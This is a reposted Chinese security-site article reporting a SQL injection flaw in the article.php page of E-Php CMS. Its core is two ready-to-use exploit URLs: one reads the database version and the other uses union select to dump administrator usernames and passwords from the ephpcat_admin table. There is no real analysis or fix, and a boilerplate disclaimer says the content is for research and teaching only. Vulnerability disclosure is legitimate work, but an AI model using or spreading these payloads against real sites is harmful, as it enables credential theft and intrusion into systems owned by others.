【转载】E-Php内容管理系统sql注射漏洞利用

admin
admin
admin
138691
文章
114
评论
2021年4月3日18:56:13评论16 views字数 525阅读1分45秒阅读模式

E-Php 内容管理系统 SQL 注射漏洞利用:

    E-Php 内容管理系统,E-Php Content Management System (CMS),article.php 页面存在 SQL 注射漏洞。

漏洞测试:Exploit

    http://127.0.0.1/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12

    http://127.0.0.1/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin

文章来源于lcx.cc:【转载】E-Php内容管理系统sql注射漏洞利用

相关推荐: 论安卓手机抓包方案,手机应用抓包:哪个安卓虚拟机可以抓包的啊?

哪个安卓虚拟机可以抓包的啊? U神 (在乌云提问就是在成长!) | 2014-03-29 10:32 想玩玩APP,但是这破手机啊~连个代理都没有~ 想知道哪一款安卓虚拟机安装之后,可以通过真实机截图该虚拟安卓设备的数据包的~网上的试了下都不行~真郁闷~ [原…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:56:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【转载】E-Php内容管理系统sql注射漏洞利用https://cn-sec.com/archives/319288.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息